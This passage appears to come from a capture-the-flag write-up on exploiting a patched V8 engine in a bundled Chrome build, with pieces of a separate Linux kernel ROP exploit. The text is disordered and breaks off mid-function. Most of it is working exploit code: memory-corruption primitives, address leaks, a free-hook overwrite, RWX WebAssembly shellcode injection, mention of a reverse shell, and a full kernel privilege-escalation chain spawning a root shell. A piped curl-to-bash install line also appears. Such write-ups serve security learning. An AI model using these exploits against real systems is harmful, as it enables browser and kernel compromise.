as it allows us to run our own shellcode. I'm gonna save this in exploit2.js
.
If we create a function in WebAssembly, it will create a RWX page that we can leak. The WASM code itself is not important, we only care about the RWX page. To that effect I'll use the WASM used by Faith, because the website wasmfiddle
has been closed down and I cannot for the life of me find an alternative. Let me know if you do.
We can see that this creates an RWX page:
If we leak the addresses of wasm_mod
, wasm_instance
and f
, none of them are actually located in the RWX page, so we can't simply addrof()
and apply a constant offset. Instead, we're gonna comb memory for all references to the RWX page. The WASM objects likely need a reference to it of sorts, so it's possible a pointer is stored nearby in memory.
The last four are in the heap, so unlikely, but the first result is near the wasm_instance
and f
. The offset between wasm_instance
and that address appears to be
. In reality it is 0x88
(remember pointer tagging!), but that works for us.
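Reading the pointer out with the primitives we already have:
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));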
It spits out the right base, which is great. Now we just want to get shellcode for popping calculator as well as a method for copying the shellcode there. I'm gonna just (once again) shamelessly nab Faith's implementations for that, which are fairly self-explanatory.
And then we just copy it over and pop a calculator:
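Using Faith's copy_shellcode() helper and the shellcode array shown in the full exploit2.js listing below:
console.log("[+] Copying Shellcode...");
copy_shellcode(rwx_base, shellcode);
console.log("[+] Running Shellcode...");
f();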
Running this under GDB causes it to crash for me, but running it in bash works fine:
With a calculator popped!
Create an index.html
with the following code:
Make sure exploit2.js
is in the same folder. Then load the index.html
with the version of Chrome bundled in the challenge:
And it pops calculator! You can also place it in another folder and use python's SimpleHTTPServer to serve it and connect that way - it works either way.
Well, we are hackers, we like the idea of a reverse shell, no? Plus it makes you feel way cooler to be able to do that.
Grabbing the reverse shell code from and modifying it slightly to change it to loopback to 127.0.0.1
:
Listening with nc -nvlp 4444
, we get the prompt for a password, which is 12345678
. Input that, and bingo! It even works on the Chrome instance!
First off, give a follow, they deserve it.
Secondly, WASM makes no sense to me, but oh well. Sounds like a security nightmare.
uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq = 0xffffffff81022e1f; // iretq; pop rbp; ret
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
int main() {
// [...]
// overflow
uint64_t payload[25];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// [...]
}
0xffffffff810dcf72: pop rdx; ret
0xffffffff811ba595: mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
0xffffffff810a2e0d: mov rdx, rcx; ret;
0xffffffff8126caee: mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
// [...]
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
0xffffffff8129011e: swapgs; ret;
0xffffffff81022e1f: iretq; pop rbp; ret;
// swapgs and iretq back to userland
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
// gcc -static -o exploit exploit.c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
void get_shell(void){
puts("[*] Returned to userland");
system("/bin/sh");
}
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
uint64_t user_rip = (uint64_t) get_shell;
void save_state(){
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
uint64_t pop_rdi = 0xffffffff811e08ec;
uint64_t swapgs = 0xffffffff8129011e;
uint64_t iretq = 0xffffffff81022e1f; // iretq; pop rbp; ret
uint64_t prepare_kernel_cred = 0xffffffff81066fa0;
uint64_t commit_creds = 0xffffffff81066e00;
uint64_t pop_rdx = 0xffffffff810dcf72; // pop rdx; ret
uint64_t mov_rcx_rax = 0xffffffff811ba595; // mov rcx, rax; test rdx, rdx; jne 0x3ba58c; ret;
uint64_t mov_rdx_rcx = 0xffffffff810a2e0d; // mov rdx, rcx; ret;
uint64_t mov_rdi_rax = 0xffffffff8126caee; // mov rdi, rax; cmp rdi, rdx; jne 0x46cae5; xor eax, eax; ret;
int main() {
save_state();
// communicate with the module
int fd = open("/dev/kernel_rop", O_RDWR);
printf("FD: %d\n", fd);
// overflow
uint64_t payload[25];
int i = 6;
// prepare_kernel_cred(0)
payload[i++] = pop_rdi;
payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
// commit_creds()
payload[i++] = pop_rdx;
payload[i++] = 0;
payload[i++] = mov_rcx_rax;
payload[i++] = mov_rdx_rcx;
payload[i++] = mov_rdi_rax;
payload[i++] = commit_creds;
// swapgs and iretq back to userland
payload[i++] = swapgs;
payload[i++] = iretq;
payload[i++] = user_rip;
payload[i++] = user_cs;
payload[i++] = user_rflags;
payload[i++] = user_rsp;
payload[i++] = user_ss;
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
}
-cpu qemu64,+smep,+smap
$ sudo apt update
$ sudo apt install git vim
$ git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
$ echo "export PATH=/tools/depot_tools:$PATH" >> ~/.bashrc
$ fetch v8
$ cd v8
v8$ ./build/install-build-deps.sh
v8$ git checkout 6dc88c191f5ecc5389dc26efa3ca0907faef3598
v8$ gclient sync
$ 7z x Chrome.tar.gz
$ tar -xvf Chrome.tar
$ cp Chrome/oob.diff .
v8$ git apply ../oob.diff
v8$ ./tools/dev/v8gen.py x64.release
v8$ ninja -C ./out.gn/x64.release
Traceback (most recent call last):
File "/tools/depot_tools/ninja.py", line 14, in <module>
import gclient_paths
File "/tools/depot_tools/gclient_paths.py", line 24, in <module>
def FindGclientRoot(from_dir, filename='.gclient'):
File "/usr/lib/python3.6/functools.py", line 477, in lru_cache
raise TypeError('Expected maxsize to be an integer or None')
TypeError: Expected maxsize to be an integer or None
$ sudo apt install python3.8
$ sudo ln -sf /usr/bin/python3.8 /usr/bin/python3
$ ninja --version
depot_tools/ninja.py: Could not find Ninja in the third_party of the current project, nor in your PATH.
Please take one of the following actions to install Ninja:
- If your project has DEPS, add a CIPD Ninja dependency to DEPS.
- Otherwise, add Ninja to your PATH *after* depot_tools.
$ sudo apt install ninja-build
v8$ ninja -C ./out.gn/x64.release
v8$ ./tools/dev/v8gen.py x64.debug
v8$ ninja -C ./out.gn/x64.debug
$ sudo ln -sf /usr/bin/python3.6 /usr/bin/python3
$ bash -c "$(curl -fsSL https://gef.blah.cat/sh)"
diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
Builtins::kArrayPrototypeCopyWithin, 2, false);
SimpleInstallFunction(isolate_, proto, "fill",
Builtins::kArrayPrototypeFill, 1, false);
+ SimpleInstallFunction(isolate_, proto, "oob",
+ Builtins::kArrayOob,2,false);
SimpleInstallFunction(isolate_, proto, "find",
Builtins::kArrayPrototypeFind, 1, false);
SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
return *final_length;
}
} // namespace
+BUILTIN(ArrayOob){
+ uint32_t len = args.length();
+ if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+ Handle<JSReceiver> receiver;
+ ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+ isolate, receiver, Object::ToObject(isolate, args.receiver()));
+ Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+ FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+ uint32_t length = static_cast<uint32_t>(array->length()->Number());
+ if(len == 1){
+ //read
+ return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+ }else{
+ //write
+ Handle<Object> value;
+ ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+ isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+ elements.set(length,value->Number());
+ return ReadOnlyRoots(isolate).undefined_value();
+ }
+}
BUILTIN(ArrayPush) {
HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel) \
/* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */ \
TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel) \
+ CPP(ArrayOob) \
\
/* ArrayBuffer */ \
/* ES #sec-arraybuffer-constructor */ \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
return Type::Receiver();
case Builtins::kArrayUnshift:
return t->cache_->kPositiveSafeInteger;
+ case Builtins::kArrayOob:
+ return Type::Receiver();
// ArrayBuffer functions.
case Builtins::kArrayBufferIsView:
+ SimpleInstallFunction(isolate_, proto, "oob",
+ Builtins::kArrayOob,2,false);
BUILTIN(ArrayOob){
uint32_t len = args.length();
if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
Handle<JSReceiver> receiver;
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, receiver, Object::ToObject(isolate, args.receiver())
);
Handle<JSArray> array = Handle<JSArray>::cast(receiver);
FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
uint32_t length = static_cast<uint32_t>(array->length()->Number());
if(len == 1) {
//read
return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
} else {
//write
Handle<Object> value;
ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
isolate, value, Object::ToNumber(isolate, args.at<Object>(1))
);
elements.set(length,value->Number());
return ReadOnlyRoots(isolate).undefined_value();
}
}
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
./d8 --shell ./exploit.js
var object1 = {a: 20, b: 40};
var object2 = {a: 30, b: 60};
$ gdb d8
gef➤ run --allow-natives-syntax
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0x30b708b4dd71: [JSArray]
- map: 0x09bccc0c2ed9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x2358a3991111 <JSArray[0]>
- elements: 0x30b708b4dd51 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 2
- properties: 0x3659bdb00c71 <FixedArray[0]> {
#length: 0x0418bc0c01a9 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x30b708b4dd51 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
0x9bccc0c2ed9: [Map]
- type: JS_ARRAY_TYPE
- instance size: 32
- inobject properties: 0
- elements kind: PACKED_DOUBLE_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x09bccc0c2e89 <Map(HOLEY_SMI_ELEMENTS)>
- prototype_validity cell: 0x0418bc0c0609 <Cell value= 1>
- instance descriptors #1: 0x2358a3991f49 <DescriptorArray[1]>
- layout descriptor: (nil)
- transitions #1: 0x2358a3991eb9 <TransitionArray[4]>Transition array #1:
0x3659bdb04ba1 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x09bccc0c2f29 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype: 0x2358a3991111 <JSArray[0]>
- constructor: 0x2358a3990ec1 <JSFunction Array (sfi = 0x418bc0caca1)>
- dependent code: 0x3659bdb002c1 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0
[1.5, 2.5]
d8>
gef➤ x/4gx 0x30b708b4dd70
0x30b708b4dd70: 0x000009bccc0c2ed9 0x00003659bdb00c71
0x30b708b4dd80: 0x000030b708b4dd51 0x0000000200000000
gef➤ x/10gx 0x000030b708b4dd50
0x30b708b4dd50: 0x00003659bdb014f9 0x0000000200000000 <- elements (map, length)
0x30b708b4dd60: 0x3ff8000000000000 0x4004000000000000 <- array entries
0x30b708b4dd70: 0x000009bccc0c2ed9 0x00003659bdb00c71 <- JSArray
0x30b708b4dd80: 0x000030b708b4dd51 0x0000000200000000
0x30b708b4dd90: 0x00003659bdb01cc9 0x0000000400000000
gef➤ p/f 0x3ff8000000000000
$1 = 1.5
gef➤ p/f 0x4004000000000000
$2 = 2.5
$ gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> a.oob()
2.28382032514e-310
d8> ftoi(a.oob()).toString(16)
"2a0a9af82ed9"
d8> %DebugPrint(a)
0x2d83ee78e0b9 <JSArray[2]>
[1.5, 2.5]
d8> ^C
gef➤ x/4gx 0x2d83ee78e0b8
0x2d83ee78e0b8: 0x00002a0a9af82ed9 0x00000db811140c71
0x2d83ee78e0c8: 0x00002d83ee78e099 0x0000000200000000
var float_arr = [1.5, 2.5]
var obj1 = {a: 1, b: 2}
var obj2 = {a: 5, b: 10}
var obj_arr = [obj1, obj2]
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> var float_arr = [1.5, 2.5]
undefined
d8> var obj1 = {a: 1, b: 2}
undefined
d8> var obj2 = {a: 5, b: 10}
undefined
d8> var obj_arr = [obj1, obj2]
undefined
d8> %DebugPrint(float_arr)
0x3a38af88e0c9 <JSArray[2]>
[1.5, 2.5]
d8> %DebugPrint(obj_arr)
0x3a38af8915f1 <JSArray[2]>
[{a: 1, b: 2}, {a: 5, b: 10}]
gef➤ x/4gx 0x3a38af88e0c8
0x3a38af88e0c8: 0x0000179681882ed9 0x0000389170c80c71
0x3a38af88e0d8: 0x00003a38af88e0a9 0x0000000200000000
gef➤ x/4gx 0x00003a38af88e0a8 <-- access elements array
0x3a38af88e0a8: 0x0000389170c814f9 0x0000000200000000
0x3a38af88e0b8: 0x3ff8000000000000 0x4004000000000000
gef➤ x/4gx 0x3a38af8915f0
0x3a38af8915f0: 0x0000179681882f79 0x0000389170c80c71
0x3a38af891600: 0x00003a38af8915d1 0x0000000200000000
gef➤ x/4gx 0x00003a38af8915d0 <-- access elements array
0x3a38af8915d0: 0x0000389170c80801 0x0000000200000000
0x3a38af8915e0: 0x00003a38af8904f1 0x00003a38af8906b1
d8> %DebugPrint(obj1)
0x3a38af8904f1 <Object map = 0x17968188ab89>
{a: 1, b: 2}
d8> %DebugPrint(obj2)
0x3a38af8906b1 <Object map = 0x17968188ab89>
{a: 5, b: 10}
d8> var map_float = float_arr.oob()
d8> obj_arr.oob(map_float)
d8> ftoi(obj_arr[0]).toString(16)
"3a38af8904f1"
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
$ gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
V8 version 7.5.0 (candidate)
d8> obj = {a:1}
{a: 1}
d8> %DebugPrint(obj)
0x031afef4ebe9 <Object map = 0x3658c164ab39>
{a: 1}
d8> addrof(obj).toString(16)
"31afef4ebe9"
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
let fake = fakeobj(addrof(arb_rw_arr));
}
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
}
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will return the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write address to backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16))
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16))
[+] Float Map: 0x2b1dc2e82ed9
[+] Object Map: 0x2b1dc2e82f79
gef➤ vmmap
[...]
0x00002b1dc2e80000 0x00002b1dc2ec0000 0x0000000000000000 rw-
[...]
$ gdb ./d8
gef➤ run --allow-natives-syntax --shell exploit.js
[+] Address of Arbitrary RW Array: 0x64d2a00f499
[+] Float Map: 0x1d8734482ed9
[+] Object Map: 0x1d8734482f79
[+] Map Region Start: 0x1d8734480000
V8 version 7.5.0 (candidate)
d8> ^C
gef➤ vmmap
[...]
0x00001d8734480000 0x00001d87344c0000 0x0000000000000000 rw-
[...]
0x0000555555554000 0x00005555557e7000 0x0000000000000000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555557e7000 0x00005555562af000 0x0000000000293000 r-x /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562af000 0x00005555562ef000 0x0000000000d5b000 r-- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562ef000 0x00005555562f9000 0x0000000000d9b000 rw- /home/andrej/Desktop/oob-v8/v8/out.gn/x64.release/d8
0x00005555562f9000 0x00005555563c6000 0x0000000000000000 rw- [heap]
[...]
0x00007ffff7005000 0x00007ffff71ec000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff71ec000 0x00007ffff73ec000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73ec000 0x00007ffff73f0000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff73f0000 0x00007ffff73f2000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so
[...]
gef➤ x/200gx 0x1d8734480000
0x1d8734480000: 0x0000000000040000 0x0000000000000004
0x1d8734480010: 0x00005555563a7f60 0x000055555631a2e0
0x1d8734480020: 0x00001d8734480000 0x0000000000040000
0x1d8734480030: 0x0000555556329b60 0x00001d8734480001
0x1d8734480040: 0x0000555556394e90 0x00001d8734480138
0x1d8734480050: 0x00001d87344c0000 0x0000000000000000
0x1d8734480060: 0x0000000000000000 0x0000000000000000
[...]
let heap_leak = arb_read(map_reg_start + 0x10n);
let heap_base = heap_leak - 0xaef60n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16))
gef➤ x/200gx 0x5555562f9000
0x5555562f9000 <_ZN2v85Shell15local_counters_E+2400>: 0x0000000000000000 0x0000000000000000
0x5555562f9010 <_ZN2v85Shell15local_counters_E+2416>: 0x0000000000000000 0x0000000000000000
0x5555562f9020 <_ZN2v85Shell15local_counters_E+2432>: 0x0000000000000000 0x0000000000000000
[...]
gef➤ x/10gx 0x000055555631a2e0
0x55555631a2e0: 0x00005555562dbea8 0x0000000000001000
0x55555631a2f0: 0x0000000000001000 0x0000000000000021
[...]
let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));
let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));
readelf -a d8 | grep -i read
[...]
000000d9a4c0 003d00000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
[...]
let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));
gef➤ p &system
$1 = (int (*)(const char *)) 0x7ffff7054420 <__libc_system>
gef➤ p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff73f28e8 <__free_hook>
// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;
console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");
// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will return the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write the address to the backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
// exploit
// leaks
console.log("[+] Float Map: 0x" + ftoi(map_float).toString(16));
console.log("[+] Object Map: 0x" + ftoi(map_obj).toString(16));
let map_reg_start = ftoi(map_float) - 0x2ed9n;
console.log("[+] Map Region Start: 0x" + map_reg_start.toString(16));
let heap_leak = arb_read(map_reg_start + 0x18n);
let heap_base = heap_leak - 0x212e0n;
console.log("[+] Heap Base: 0x" + heap_base.toString(16));
let binary_leak = arb_read(heap_leak);
let binary_base = binary_leak - 0xd87ea8n;
console.log("[+] Binary Base: 0x" + binary_base.toString(16));
let read_got = binary_base + 0xd9a4c0n;
console.log("[+] read@got: 0x" + read_got.toString(16));
let read_libc = arb_read(read_got);
console.log("[+] read@libc: 0x" + read_libc.toString(16));
let libc_base = read_libc - 0xbc0430n;
console.log("[+] LIBC Base: 0x" + libc_base.toString(16));
// system and free hook offsets
let system = libc_base + 0x4f420n;
let free_hook = libc_base + 0x3ed8e8n;
console.log("[+] Exploiting...");
arb_write(free_hook, system);
console.log("xcalc");
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
gef➤ vmmap
[...]
0x000035d2131ff000 0x000035d21b141000 0x0000000000000000 ---
0x0000396a8d0b5000 0x0000396a8d0b6000 0x0000000000000000 rwx
0x0000396a8d0b6000 0x0000396acd0b5000 0x0000000000000000 ---
[...]
console.log("[+] WASM Mod at 0x" + addrof(wasm_mod).toString(16));
console.log("[+] WASM Instance at 0x" + addrof(wasm_instance).toString(16));
console.log("[+] F at 0x" + addrof(f).toString(16));
gef➤ run --allow-natives-syntax --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x22322b10f919
[+] WASM Mod at 0x22322b10fcc9
[+] WASM Instance at 0x45c390e13a1
[+] F at 0x45c390e1599
V8 version 7.5.0 (candidate)
d8> ^C
gef➤ vmmap
[...]
0x0000311254159000 0x000031125415a000 0x0000000000000000 rwx
[...]
gef➤ search-pattern 0x0000311254159000
[+] Searching '\x00\x90\x15\x54\x12\x31\x00\x00' in memory
[+] In (0x45c390c0000-0x45c39100000), permission=rw-
0x45c390e1428 - 0x45c390e1448 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
[+] In '[heap]'(0x5555562f9000-0x5555563c6000), permission=rw-
0x5555563a1e38 - 0x5555563a1e58 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563acfe0 - 0x5555563ad000 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563ad000 - 0x5555563ad020 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
0x5555563ad120 - 0x5555563ad140 → "\x00\x90\x15\x54\x12\x31\x00\x00[...]"
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));
function copy_shellcode(addr, shellcode) {
// create a buffer of 0x100 bytes
let buf = new ArrayBuffer(0x100);
let dataview = new DataView(buf);
// overwrite the backing store so the 0x100 bytes can be written to where we want
// this is similar to the arb_write() function
// but we have to redo it because we want to write way more than 8 bytes
